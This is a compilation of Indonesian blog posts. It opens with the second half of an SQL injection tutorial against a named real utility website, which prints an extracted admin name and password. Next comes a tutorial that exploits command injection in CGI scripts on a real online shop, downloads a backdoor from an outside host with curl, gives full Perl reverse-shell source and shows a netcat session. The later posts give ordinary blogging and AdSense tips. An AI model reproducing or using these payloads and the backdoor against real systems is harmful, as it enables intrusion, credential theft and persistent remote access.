Berikut adalah pesan error yang terjadi, jika kita mengecek
field terakhir dengan meng-inject:
' group by T_ADMIN.NOMOR,T_ADMIN.NIP,T_ADMIN.PASSWORD,
T_ADMIN.NAMA,T_ADMIN.KD_RANTING,T_ADMIN.ADDRESS,T_ADMIN.EMAIL
having 1=1--
(catatan : kalimat harus 1 baris, tidak dipotong)
--------------------
- NIP atau Password atau Unit Anda salah !! -
--------------------
Sukses !!! Kita berhasil menemukan field terakhir.
Daftar kolom (field):
T_ADMIN.NOMOR
T_ADMIN.NIP
T_ADMIN.PASSWORD
T_ADMIN.NAMA
T_ADMIN.KD_RANTING
T_ADMIN.ADDRESS
T_ADMIN.EMAIL
Hanya ada satu tabel untuk otentifikasi ini (yaitu T_ADMIN),
ini akan mempermudah proses kita selanjutnya.

Langkah berikutnya, kita menentukan jenis struktur field-
field tersebut di atas.

Kita inject di kotak NIP (pass terserah) :
' union select sum(NOMOR) from T_ADMIN--
Arti dari query tersebut adalah : kita coba menerapkan
klausa sum sebelum menentukan apakah jumlah kolom-kolom
di dua rowsets adalah sejenis.
Bahasa mudahnya adalah kita memasukkan klausa sum (jumlah)
yang berlaku untuk type kolom numerik, jadi untuk type kolom
yang bukan numerik, akan keluar error yang bisa memberitahu
kita jenis kolom yang dimaksud.
Pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]All queries
in an SQL statement containing a UNION operator must have
an equal number of expressions in their target lists.
/sipm/admin/dologin.asp, line 7
--------------------
artinya kolom NOMOR berjenis numerik.

Berikutnya kita inject :
' union select sum(NIP) from T_ADMIN--
Akan keluar pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]The sum
or average aggregate operation cannot take a char data
type as an argument.
/sipm/admin/dologin.asp, line 7
--------------------
Artinya kolom NIP bertype char.

Kita harus mengulang perintah di atas untuk kolom yang
berikutnya dengan jalan mengganti nama_kolom di :
' union select sum(nama_kolom) from T_ADMIN--
dengan kolom yang berikutnya.
Kita peroleh 7 type kolom:
T_ADMIN.NOMOR => numeric
T_ADMIN.NIP => char
T_ADMIN.PASSWORD => nvarchar
T_ADMIN.NAMA => char
T_ADMIN.KD_RANTING => char
T_ADMIN.ADDRESS => nvarchar
T_ADMIN.EMAIL => char

Langkah berikutnya, kita akan mencari isi kolom password,
untuk user admin, dengan meng-inject :
' union select min(NAMA),1,1,1,1,1,1 from T_ADMIN where NAMA > 'a'--
artinya kita memilih minimum nama user yang lebih besar dari 'a'
dan mencoba meng-konvert-nya ke tipe integer.
Arti angka 1 sebanyak 6 kali itu adalah bahwa kita hanya memilih
kolom NAMA, dan mengabaikan 6 kolom yang lain.
Akan keluar pesan error :
--------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the varchar value 'bill ' to
a column of data type int.
/sipm/admin/dologin.asp, line 7
--------------------
Anda lihat :
varchar value 'bill '
'bill' itu adalah nama user di record yang terakhir dimasukkan,
atau isi kolom NAMA di record yang terakhir dimasukkan.

Selanjutnya kita inject :
' union select min(PASSWORD),1,1,1,1,1,1 from T_ADMIN where
NAMA = 'bill'--
catatan : harus sebaris (tidak dipotong).
Akan keluar error :
---------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax
error converting the nvarchar value 'm@mpusk@u' to a
column of data type int.
/sipm/admin/dologin.asp, line 7
---------------------
Artinya kita berhasil !!!
Kita dapatkan
[+] NAMA = bill
[+] PASSWORD = m@mpusk@u

Silahkan login ke :
www.pln-wilkaltim.co.id/sipm/admin/admin.asp
dengan account di atas, sedang nama cabang, silahkan anda
isi sendiri dengan cara coba-coba

Atau kita pakai jalan pintas saja....

Kita inject-kan :
' union select min(KD_RANTING),1,1,1,1,1,1 from T_ADMIN
where NAMA ='bill'--
catatan : harus satu baris.
Duarrrrrr..........
Glhodhak.............
Langsung masuk ke menu admin.
Ingat : jangan buat kerusakan ! beritahu sang admin !!!

Lubang ke dua adalah pada bagian berita.
Pada dasarnya berita di situ adalah isi dari tabel yang
lain lagi. Jadi tetep bisa kita inject !!!
Bedanya, kita harus memasukkan parameter di alamat URL-nya.
Contoh :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119&idm=40&idSM=2
ada parameter id dan idSM.
Setelah kita coba inject, ternyata yang berpengaruh adalah
parameter id aja (CMIIW).

Kita inject-kan :
www.pln-wilkaltim.co.id/dari_Media.asp?id=2119' having 1=1--
akan keluar pesan error :
---------------------------
Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)
[Microsoft][ODBC SQL Server Driver][SQL Server]Column
'tb_news.NewsId' is invalid in the select list because
it is not contained in an aggregate function and
there is no GROUP BY clause.
/dari_Media.asp, line 58
---------------------------
artinya 'tb_news.NewsId' itulah nama tabel dan kolom kita
yang pertama.

Ulangi langkah-langkah kita di atas sampai didapatkan :
tb_news.NewsId => numeric
tb_news.NewsCatId => numeric
tb_news.EntryDate => datetime
tb_news.Title => nvarchar
tb_news.Content =>
tb_news.FotoLink =>
tb_news.FotoType => bit data
tb_news.review =>
tb_news.sumber => char
tb_news.dateagenda => datetime

Nah, selanjutnya adalah tugas anda sendiri untuk mengembangkan
pengetahuan anda.
Anda bisa men-insert berita yang bisa anda tentukan sendiri
isinya.

Inilah mengapa hole di MS-SQL Server ini demikian berbahaya.

Perkiraan saya, nama-nama partai di situs KPU yang di-hack
oleh Shizoprenic, juga ada di tabel-tabel suatu database,
jadi tetep bisa dimasuki dengan cara SQL Injection ini.


******************************************************
KHUSUS BUAT ADMIN & WEB PROGRAMMER !!!
******************************************************
Cara pencegahan yang umum digunakan :
1. Batasi panjang input box (jika memungkinkan), dengan
cara membatasinya di kode program, jadi si cracker pemula
akan bingung sejenak melihat input box nya gak bisa di
inject dengan perintah yang panjang.
2. Filter input yang dimasukkan oleh user, terutama penggunaan
tanda kutip tunggal (Input Validation).
3. Matikan atau sembunyikan pesan-pesan error yang keluar
dari SQL Server yang berjalan.
4. Matikan fasilitas-fasilitas standar seperti Stored Procedures,
Extended Stored Procedures jika memungkinkan.
5. Ubah "Startup and run SQL Server" menggunakan low privilege user
di SQL Server Security tab.


Yah itulah mungkin yang dapat saya ceritakan.....
Hal itu adalah gambaran, betapa tidak amannya dunia internet...
Kalau mau lebih aman, copot kabel jaringan anda, copot disk
drive anda, copot harddisk anda, jual kompie anda !!!
Just kidding )


Referensi :
[+] sqlinjection, www.BlackAngels.it
[+] anvanced sql injection in sql server applications
(www.ngssoftware.com)
[+] sql injection walktrough (www.securiteam.com)

Connect Back melalui Bug CGI

:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.

Penulis tidak bertanggung jawab atas akibat atau dampak yang disebabkan oleh
penggunaan materi dari tutorial ini. Tujuan penulis hanya ingin menyampaikan
materi kepada pihak-pihak yang bertanggung jawab dan "Want to learn", tidak
kepada pihak-pihak yang ingin merugikan orang lain.
.:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.:..:.:.:.:.:.

Intro
$>Seperti yang sudah kita tahu Bug CGI memungkinkan kita untuk melaksanakan command-command
untuk meng-eksploitasi sistem. Tetapi hal ini juga dipengaruhi oleh settingan dari sistem
tersebut apakah mengijinkan kita untuk membuat/menulis File di Server tersebut.

Tujuan
$>Membuat suatu backdoor dengan cara connect back melalui CGI Bug

Tools atau Softwarez dan Skill yang diperlukan
$>Setidaknya mengerti perintah/command *Nix atau Linux (ls, cp, rm, cat, locate ,dll)
$>Softwarez : Browser HTML (Opera, FireFox, IE, dll)
$>Tools : NetCat dan file backdoor (.txt atau .prl)

Tutorial
$>Langkah pertama yang harus dilakukan adalah mencari site yang menggunakan CGI dengan bug :
"shop.pl?seite" atau "family_showpage.cgi". Bagaimana mencarinya? yaitu googling dan memasukkan
keyword allinurl dengan tambahan bug diatas. Contoh, allinurl : "shop.pl?seite". Maka kita akan
dapat berbagai macam halaman yang dapat di-tes bugnya. Pilih salah satu dan kita akan memulai mencoba
connect back.
$>Langkah kedua yaitu masukkan perintah/command yang diinginkan diantara char "||", maka perintah kita
akan terlihat seperti ini : |perintah|, selain dengan char pipe(|) bisa juga menggunakan char ";".
Contoh (dengan bug shop.pl?seite) :

>> https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html&KNR=3055892
>> https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|perintah|&KNR=3055892
>> https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|ls|&KNR=3055892

Maka pada browser kita akan terlihat isi dari direktori server tersebut.
Contoh :
finnishorder.pl formmailmalaysia.pl honeymoon.cfg honeymoon.pl honeymoonfinnishorder.pl
honeymoonorder.pl ikonboard order.pl preise.pl remview.php shop.cfg shop.pl

Weikkss....Banyak filenya tuh :P

$>Langkah ketiga cek apakah kita diijinkan untuk menulis/membuat file disana dengan perintah "id"

>> https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|id|&KNR=3055892

Kalo benar maka akan tampak :

uid=290076(ade001) gid=103(web) groups=103(web)

Perhatikan User-idnya, Wah sepertinya kita bisa nih nulis/remove File :D

$>Selanjutnya kita upload File Backdoor yang kita ambil dari site lain,

https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|curl -o back.txt http://www.goodwillco.com/tes.txt|&KNR=3055892

Catatan : Site www.goodwillco.com hanya menyediakan file backdoor yaitu tes.txt, kalo sudah tidak ada silahkan
copy-paste teks berikut kedalam Notepad dan simpan dengan Ekstensi *.txt, Coding by 1St :D

#!/usr/bin/perl
# Remote Connect-Back Backdoor Shell v1.0.
# (c)AresU 2004
# 1ndonesia Security Team (1st)
# AresU[at]bosen.net
# Usage:
# 1) Listen port to received shell prompt using NetCat on your toolbox, for example: nc -l -p 9000
# 2) Remote Command Execution your BackDoor Shell, for example: perl connect.pl
# --------
# The supplied exploit code is not to be used for malicious purpose, but for educational purpose only. The Authors and 1ndonesian Security Team WILL NOT responsible for anything happened by the couse of using all information on these website.
# ---------

use Socket;
$pamer="(c)AresU Connect-Back Backdoor Shell v1.0\n1ndonesia Security Team (1st)\n\n";
$cmd= "lpd";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
print STDOUT $pamer;
system($system);
close(STDIN);
close(STDOUT);
close(STDERR)

Catatan2 : curl -o akan menyimpan file backdoor di server web sasaran dengan nama back.txt
Kalo curl -o tidak bisa gunakan wget -o.

$> Lakukan lagi perintah ls untuk melihat apakah file backdoor kita sudah ter-upload...

https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|ls|&KNR=3055892

back.txt finnishorder.pl formmailmalaysia.pl honeymoon.cfg honeymoon.pl honeymoonfinnishorder.pl
honeymoonorder.pl ikonboard order.pl preise.pl remview.php shop.cfg shop.pl

Tampaknya file backdoor kita sudah ada tuh :D

$> Buka port di kompie kita dengan binding port melalui netcat.exe, Perintahnya >

C:\>netcat.exe -lLvvp 9000

catatan: port 9000 dan drive system bisa diganti sesuai dengan kondisi komputer masing2 :D

Kalo sudah maka netcat akan melisten koneksi yang masuk di port 9000 tersebut

$> Kita akan melakukan connectback dari server korban dengan meng-compile file backdorr tsb :

https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|PERL back.txt 61.xxx.xxx.xxx 9000|&KNR=3055892

catatan: ip 61.xxx.xxx.xxx adalah alamat IP komputer kita dan 9000 adalah port tujuan yang sudah terbuka
jika komputer kita memakai proxy atau firewall harap di konfigurasi ulang agar server korban bisa melakukan
connectback terhadap kita :D

Bila benar maka :

C:\>netcat -lLvvp 9000
listening on [any] 9000 ...
connect to [61.xxx.xxx.xxx] from www.a66.de [213.198.17.90] 14542
(c)AresU Connect-Back Backdoor Shell v1.0
1ndonesia Security Team (1st)

Linux a66.de 2.4.2 FreeBSD 4.7-RELEASE-p22 #5: Tue May 3 13:36:49 MDT 2005
roo i386 unknown
uid=290076(ade001) gid=103(web) groups=103(web)
ls
back.txt
finnishorder.pl
formmailmalaysia.pl
honeymoon.cfg
honeymoon.pl
honeymoonfinnishorder.pl
honeymoonorder.pl
ikonboard
order.pl
preise.pl
remview.php
shop.cfg
shop.pl
su
su: you are not in the correct group (sys) to su root.

weiikkssss....bisa konek ternyata :D, tapi sayangnya kita gak bisa akses super user tuh :(
Mungkin kita bisa liat groupnya :

https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|ls /etc|&KNR=3055892

DIR_COLORS X11 bashrc csh.cshrc csh.login filesystems group host.conf hosts.allow hosts.deny info-dir inputrc
ld.so.cache ld.so.conf ldap_auth master.passwd mhpop_redirect mtab nsswitch.conf opt pam.d passwd profile profile.d
redhat-release rpc rpm securetty shells skel ssd.attrib syb_dbs termcap xinetd.d yp.conf

https://www.a66.de/cgi-local/shop.pl?seite=hauptseite.html|cat /etc/group|&KNR=3055892

sys::0:root,bin,sys,adm,devel,smoc1,daemon,vbackups,sap,sentinel root::0:root daemon::1:root,daemon bin::2:root,bin,daemon
adm::3:root,adm,daemon mail::4:root uucp::5:uucp rje::8: lp:*:9: nuucp::10:nuucp user::20: ftp::201:
other::995: guest:*:998: postgres:*:70: news:*:86: mysql:*:88: sql:*:89: staff::100:devel,smoc1 sybase::101:sybase,devel,webapps,sap,jkoecher,anonweb
client:*:102:devel,root,webapps,urchind web:*:103:root,webapps nofiles:*:104: qmail:*:105: devel:*:106:sybase,hu,webapps,sap,ftp,jkoecher,anonweb mailed:*:107:barryg
apps:*:108:hu,idsuser networks:*:109: squid:*:203: solutions:*:1025: test:*:204: dnsadmin:x:501:named tsedit:*:110:lvance,chuckr,eduda,ggarza,steve,mbalme mailedit:*:111:mminnig
nogroup:*:65533: webapps:*:149: sap:*:191: nobody:*:60001: smmsp:*:25:smmsp

Wekkksss...... :( ternyata kita hanya ada di group web doank :~~...gimana ngerubahnya ???
sayangnya tutorial ini hanya membahas caraa kita untuk melakukan connectback dengan menggunakan CGI BUG
Untuk lebih jelasnya silakan cari artikel ttg hal tsb di Google :D
Terus kita bisa ngapain ajah nih??? ya macam2 kayak liat file order.log-nya mungkin !!!???? :D
(ingat site ini adalah semacam online-shop :D), silakan masukkan perintah locate order.log atau
locate .log di browser anda :D hehehehehehhe




Special Thanks go to : Myztx @ Myztx Soft House, Om choi @ #e-c-h-o atas tutor dan kesabarannya dalam mengajari junior mu ini :D
, admin www.a66.de hehehehe jangan marah ya mas/mbak :P webnya dijadikan percobaan :D
n ndak lupa juga to Spyro (the dragon??? :P) atas tempat buat artikel ini di webnya yg makin ciamik :D

Cara Praktis Promosi Blog

Setelah selesai membuat blog, hal yg tak kalah pentingnya adalah empromosikan/memperkenalkan blog milik Anda pada dunia ramai. Apa gunanya membuat blog kalau isi curhat, puisi, cerpen, refleksi dan opini Anda yang diposting tidak dibaca orang, bukan?

Ikuti langkah-langkah promosi blog sebagai berikut:

(1) Daftarkan di blog directory

Daftarkan blog Anda ke berbagai direktori blog (blog directory). Sedikitnya, daftarkan di tiga blog directory terbesar dan terpopuler, yaitu (a) http://technorati.com (b) http://feeburner.com (c) http://blogdigger.com. Ikuti seluruh petunjuk pada ketiga blog directory tsb ketika mendaftar.Blog-blog directory ini nantinya secara otomatis akan mengirim data blog dan posting-posting anda ke berbagai search engine, termasuk tiga search engine besar yaitu http://google.com, http://msn.com, http://yahoo.com.

(2) Link-trade, Link Exchange atau Tukar Link Ajak teman anda yg memiliki blog untuk saling tukar link. Link URL anda di blog dia, dan jangan lupa anda juga memasukkan link blog teman anda tsb. di blog anda. Dalam dunia blog, ini disebut juga dg istilah BLOGROLL. Dan blogroll ini salah satu penyebab cepatnya popularitas blog di seluruh dunia, mengalahkan website yg biasa.

Blogroll atau link-exchange tidak harus melalui permintaan, bisa juga dg saling suka rela. Umpamanya, ada seseorang blogger (pemilik blog) yg memasang link Anda di blog dia, apabila Anda tahu, maka Anda juga “berkewajiban” menambah link blog dia di blog Anda. Apabila tidak, maka akan dicap sebagai “blogger pelit”. Di dunia maya pun, sebagaimana di dunia nyata, orang pelit akan selalu teralienasi. Dg kata lain, sedikit “tamu”nya.

Nah, bagaimana cara mengetahui ada yg mengelink blog Anda? Caranya mudah: tulis di kotak http://technorati.com/search alamat blog Anda atau blog siapa saja yg ingin Anda ketahui. Contoh blog ini, http://afatih.wordpress.com, setelah itu tekan search, anda akan tahu siapa saja yg ngelink ke blog tsb.

Sebagai langkah pertama ‘proyek’ tukar link, Anda bisa mencoba dg memasang link blog http://fatihsyuhud.com di sidebar blog Anda. Dalam waktu tidak lama, alamat blog Anda akan tampil di blognya.

(3) Berkunjung ke blog lain

Untuk menambah teman untuk diajak blogroll, sempatkan berkunjung ke blog2 lain, dan berkomentar di bukutamu atau tagboard mereka atau berkomentar di tulisan mereka sambil jangan lupa memasang alamat blog Anda di blog mereka. Dalam waktu tidak lama, mereka akan “bertamu balik” ke “rumah” atau blog Anda.

(4) Aktivitas posting
Usahakan sedikitnya satu kali posting setiap harinya. Posting yg teratur di blog, akan membuat tamu datang secara teratur juga.

(5) Alamat blog di signature email
Tulis alamat blog Anda di signature email. Sehingga setiap anda menulis email ke pribadi atau ke milis, alamat blog anda akan selalu muncul, dan “menggoda” orang untuk berkunjung. Memposting ringkasan tulisan di blog Anda ke milis juga akan sangat menggoda member milis untuk datang ke blog Anda. (bersambung)

Tips Memilih Template

Terkadang kita begitu terobsesi dengan template yang ‘glamour.’ Hal ini ditambah dengan begitu banyaknya pilihan template/themes yang beraneka warna. Banyak yang lupa bahwa visitor tidak begitu peduli dengan glamornya template yang kita pakai. Orang masuk ke blog kita umumnya karena isinya yang menarik, orisinil dan unik.

Selain itu, kalau kita perhatikan, situs-situs bertraffic tinggi rata-rata berpenampilan sederhana. Lihat misalnya tiga situs bertraffic tertinggi di dunia: google.com, yahoo.com dan msn.com. Ketiganya memakai template minimalist: background putih, font tulisan warna hitam dan warna tulisan di menunya yang tidak menyolok. Google.com, situs no. 1 di dunia termasuk pelopor minimalist di mana cuma ada kotak search engine dan sedikit menu link di atasnya. Dulu, yahoo.com memiliki banyak link di halaman utama / frontpage-nya, tapi sekarang sudah ‘ketularan’ google. Intinya, the simpler the better. Saya sendiri males berkunjung untuk kedua kalinya pada sebuah blog yang terlalu ribet dan berat loadingnya karena kebanyakan script yang terpasang.

Oleh karena itu, memilih template harus mempertimbangkan poin-poin di atas: pilihlah template atau themes yang rapi, background warna yang sederhana, dan warna font artikel yang enak dibaca. Saya pribadi memilih themes black and white untuk www.site.com. Pengunjung blog saya datang kebanyakan dari search engine. Mereka datang tentunya karena ingin membaca lebih lanjut artikel yang mereka cari. Saya tidak ingin mengganggu mata mereka dengan warna-warna yang “menyilaukan”.

Selain itu, tak kalah pentingnya adalah “kerapian blog.” Blog yang rapi artinya: (a) sidebar tidak melorot; (b) font artikel cukup satu warna dan satu macam; (c) blogroll atau banner terpasang rapi dan tertata; (d) cocok dibuka dengan berbagai browser, terutama IE dan firefox.

Bagaimana dg Anda? Apakah Anda suka blog rapi atau yang “rame?”

Jangan Klik Sendiri Adsense Anda

Program Adsense memiliki sejumlah tata tertib yg harus dipenuhi oleh publisher–yakni kita-kita yg memasang Adsense di blog masing-masing. Aturan lengkapnya dapat dibaca sewaktu pertama kali kita daftar. Bagi yg lupa, silahkan baca lagi TOS (terms of service) di sini agar supaya tidak salah dan berakibat akun Adsense Anda ditutup.

Dari sekian aturan Adsense, yg paling penting adalah: (1) Jangan klik sendiri iklan adsense Anda; (2) Jangan menyuruh orang lain mengklik Adsense Anda; (3) Jangan membuat kalimat yg terkesan menyuruh atau menganjurkan tamu/pengunjung untuk mengklik Iklan di blog Anda, kecuali iklan adsense referral.

Bagaimana bisa ketahuan?

1. Iklan Adsense dilengkapi dg alat pelacak (tracking) yg menunjukkan nomor IP internet Anda. Bila Anda klik sendiri, maka akan tampak jelas kelihatan oleh manajer Adsense.

2. Apabila Anda menyuruh teman Anda di tempat lain dg nomor IP berbeda dg Anda, maka mungkin kalau satu kali klik tidak apa-apa, tapi akan ketahuan begitu IP yg sama mengklik Adsense Anda setiap hari.

3. Umumnya persentase iklan yg diklik berkisar antara 1 sampai 10% dari jumlah pengunjung blog. Contohnya, apabila tamu blog dalam sehari ada 20 orang, maka paling banyak yg klik 2 (dua) pengunjung.

Dengan demikian, semakin besar pengunjung semakin besar yg ngeklik. Jadi, daripada pakai cara ilegal, mending usahakan untuk menambah pengunjung blog dg cara rajin posting dan promosi blog.

Kapan “hukuman” Adsense tiba?

Hukuman berupa ditutupnya akun (account) Adsense Anda terjadi biasanya apabila hasil adsense sudah mendekati angka $60 sampai 90. Anda biasanya akan diberitahu via email, selain itu Adsense tidak lagi nongol di blog Anda.

Permasalahan Post-Summary (Abstraksi) Blogspot

Yg saya maksud dg “penyakit” adalah bugs dalam script. Bahasa tepatnya biar ahli linguistic IT nanti yg bahas.

Sebelumnya, sudah diterangkan di sini bagaimana cara membuat abstraksi posting di blogger/blogspot supaya tidak semua posting kita tampil di halaman muka. (Apabila Anda lupa, silahkan lihat lagi di sini.

Dari pengalaman teman-teman yg sudah mencobanya dan umumnya berhasil, ternyata terkadang mengalami permasalahan sbb: (1) Terkadang, sidebar tidak nongol di halaman muka (front-page); (2) Halaman muka tidak tampil semua, seperti ada penghambat; (3) Keseluruhan posting tetap tampil di halaman muka.Solusinya sbb:(1) Pastikan sebelum mem-publish posting Anda di blog, Anda klik lagi menu “Edit HTML” di toolbar bagian atas (di samping menu “Compose”);

(2) Akan tampak SATU kode post-summary pembuka yaitu dan SATU kode post-summary penutup, yaitu .

(3) Apabila Anda menemukan kode pembuka dan penutup post-summary lebih dari satu di posting yg akan Anda publish, maka di situlah penyakit (bugs)-nya. Yg harus Anda lakukan adalah MENGHAPUSnya.

(4) Setelah menyisakan hanya satu kode pembuka dan satu kode penutup, klik publish.

(5) Selesai dan selamat ngeBLOG.

Pasang Foto di Profile Blogger/Blogspot

anyak blogger yg nanya tentang bagaimana cara memasukkan fotonya yg ganteng dan cantik di profile blognya. Berbeda dg di blog gratis lain, di blogger/blogspot, prosesnya agak sedikit rumit bagi yg masih baru di dunia internet.

Ada dua cara memasukkan foto :
Cara Pertama:

Upload foto Anda di postingan blog. Caranya:
(a) Setelah login, klik link blog Anda.
(b) Klik menu “posting” atau “Create”
(c) Di toolbar posting ada tombol bergambar panorama warna biru. Klik
di situ, dan akan muncul pop-up window untuk “upload images”
(d) Klik browse ke file foto Anda yg sudah tersimpan di komputer
(e) Klik Upload Image warna biru (tunggu beberapa saat sampai proses
upload selesai)
(f) Klik Done

(g) Sekarang foto Anda sudah masuk ke posting. Klik menu “Edit HTML”
di toolbar posting bagian atas sebelah kanan.
(h) Akan tampak sejumlah kode HTML di situ. Copy/paste kode yg berada
setelah tulisan [src=”] yaitu link yg dimulai dg [http://] dan
berakhir dg [.jpg] atau [.jpeg]
(i) Simpan link tsb. di notepad atau ditulis di kertas.
(j) Jangan lupa, klik publish.
(k) Setelah itu, klik menu “Dashboard”
(l) Klik menu “Edit Profile”
(m) Di sini ada menu “Photo URL”, paste link foto Anda tadi di kotak
yg tersedia.
(n) Klik “Save Profile” di bagian paling bawah.
(o) Selesai.CARA KEDUA
———————Cara kedua adalah dg meng-upload (memasukkan/menyimpan) foto Anda di hosting lain, dan baru kemudian link URL foto tsb. di copy/paste ke profile blogger/blogspot.

Yg paling mudah, simpan/upload foto Anda di http://geocities.com karena hosting ini milik yahoo.com. Jadi, siapa saja yg memiliki email yahoo dapat langsung log-in ke geocities.com dg memakai id yahoo Anda.

Misalkan file foto Anda adalah jenggot.jpg dan email id Anda site. Maka, nantinya setelah foto itu diupload ke geocities, link url Anda akan menjadi sebagai berikut: http://geocities.com/site/jenggot.jpg. Nah, copy/paste link
tsb. ke profile blogger.com di kolom yg tersedia dan setelah itu SAVE
CHANGES dan REPUBLISH.

Mengapa Blog Melorot

Yang namanya melorot itu terkesan tidak enak dan malu-maluin. Baju melorot, celana mlorot dan blog melorot. Sama tidak enaknya, bukan? Apa penyebab blog melorot? Pada dasarnya blog memiliki dua halaman penting yg diintegrasikan jadi satu. Pertama, sidebar, yaitu bagian samping sebuah blog tempat menu arsip, menu link posting dan link alamat blog teman-teman kita. Kedua, halaman posting, tempat postingan atau artikel kita tampil secara penuh.

Kedua faktor penting–side bar dan halaman artikel– itu sudah dibentuk sedemikian rupa supaya terintegrasi secara pas dan enak dipandang dalam satu halaman. Nah, apabila salah satu dari kedua faktor tsb. dimasukin sesuatu yg melebihi ukuran, maka terjadilah blog yg melorot/mlorot tadi. Dengan kata lain, melorotnya blog itu terjadi karena ada sesuatu (plug-in, banner, chicklet, search engine, dll) yg dipasang di sidebar atau halaman artikel yg melebihi ukuran alias kepanjangan/kelebaran alias oversized.1. SidebarUmumnya ukuran lebar maksimum yg bisa dipasang di sidebar blogger/blogspot tidak boleh melebihi 200 pixel. Idealnya 160 pixel. Apabila melebihi 200 pixel, maka sidebar akan melorot ke bawah, dan terjadilah pemandangan yg “memalukan” tsb.

2. Halaman Posting

Artikel yg ditulis di halaman posting umumnya akan secara otomatis menyesuaikan diri dg lebar halaman. Akan tetapi, ada beberapa karakter tulisan yg tidak bisa menyesuaikan diri dg lebar halaman, dan apabila ini terjadi, maka sidebar juga akan melorot. Berikut beberapa contoh karakter yg tidak dapat turun sendiri.

Beberapa contoh karakter tulisan yg tidak bisa menyesuaikan diri dg lebar halaman adala sbb:

a. Alamat link URL

Alamat link URL terkadang sangat panjang sampai melebihi panjang halaman posting, dan repotnya ia tidak bisa menyesuaikan diri. Apabila ini terjadi, maka sidebar kita akan melorot. Solusinya, “bungkus” alamat link yg panjang tsb. supaya pendek dg menambah kode
nama blog/judul artikel


Contoh: alamat URL http://site.blogspot.com menjadi
Blogger Indonesia
, maka hasilnya akan menjadi seperti ini–> Blogger Indonesia. Mudah bukan?

b. Beberapa karakter seperti tanda minus “—” atau garis bawah “___” atau sama dengan “========” kalau ditulis sangat panjang melebihi lebarnya alokasi halaman posting juga akan membuat sidebar kita melorot.

c. Plug-in dan Banner

Hati-hati dalam memasang banner iklan, iklan adsense, atau search engine di halaman posting. Lebarnya jangan melebihi kapasitas halaman posting karena akan membuat sidebar Anda melorot.

Apabila kesalahan-kesalahan yg tsb. di atas tidak terdapat di blog Anda, tapi blog masih saja melorot, maka berarti ada kesalahan kode HTML Cara termudah untuk mengatasi hal ini adalah dg membuat template baru. Sebelum merubah template baru, jangan lupa untuk men-saving link-link yg sudah terpasang di sidebar untuk nantinya dapat dipasang lagi. Untuk posting tidak perlu kuatir, begitu template baru dipilih, arsip file posting akan muncul kembali.[]

Cara Daftar Iklan Adbrite

Bagi yg suka ngeblog dalam bahasa Indonesia, tidak usah sedih kalau blognya tidak bisa dipasangin iklan google adsense. Masih ada alternatif lain yg dapat menerima blog dalam bahasa Indonesia dan cara mendaftarnya juga mudah yaitu Adbrite Marketplace lebih umum disebut Adbrite. Bagaimana cara mendaftar? Ikuti petunjuk berikut:

1. Klik linkbutton ini untuk mendaftar:
2. Ikuti petunjuk proses pendaftaran.3. Setelah diterima, masuk/login lagi ke Adbrite4. Clik menu “My Account”

5. Click menu “Create a New Zone”

6. Kasih tanda tik/check pada “Text Ads” dan “Interstitial Ads”

7. Click menu “Next: Describe Your Site.” dan isi alamat blog, judul dan diskripsi blog.

8. Apabila selesai, lanjutkan Step 3 dg mengklik menu “Next: Help new Advertisers find you in the Adbrite Marketplace.”

9. Ada tiga kotak kosong yg harus diisi dg kata kunci, tag atau keywords yg dapat memancing pemasang iklan tertarik pada blog Anda. Tip: (a) Isi dg kata kunci yg banyak yg berkaitan dg teknologi seperti internet, camera phone, laptop, dll; (b)setiap kata kunci dipisah dg koma.

10. Di bawahnya ada menu “Choose Category”. Pilih salah satu dg mengklik kategori yg ada di situ, contoh: “Technology” terus pilih lagi “second category”. Di kolom paling kanan ada menu “Include in the AdBrite site directory?” Pilih/klik “free listing”

11. Selesai, klik menu “Next..” Pilih ad format/bentuk iklan yg akan dipasang. Tip: Max character …: pilih 25; Maximum number of text ads : pilih 4; Maximum character length of ads description: pilih 70.

12. Di menu “Networks Ads” pilih “Yes”

13. Di menu “Ad content” pilih satu di antara dua.

14. Selesai, klik menu “Next: Set Pricing”. Klik “Yes I want to optimize my pricing. Start my auto pricing at” isi dg 1 dolar (ini otomatis akan berubah kalau blog Anda banyak peminat).

15. Selesai, klik “Next: Get Ad code html.”

16. Ada pilihan bentuk/format iklan antara Vertikal dan Horizontal (seperti di blog ini). Pilih sesuai keinginan Anda.

17. Copy kode html yg ada di bawahnya, dan masukkan di blog Anda.

18. Selesai.

Iklan Adbrite Referral:

Adbrite juga memiliki program afiliasi/referral. bagi yg mendaftar Adbrite melalui referral Anda, Anda akan dapat pembagian keuntungan. Cara memasang linkbutton-nya, klik menu “referral program” di sebelah kanan dari menu “My Account”.

Catatan penting:

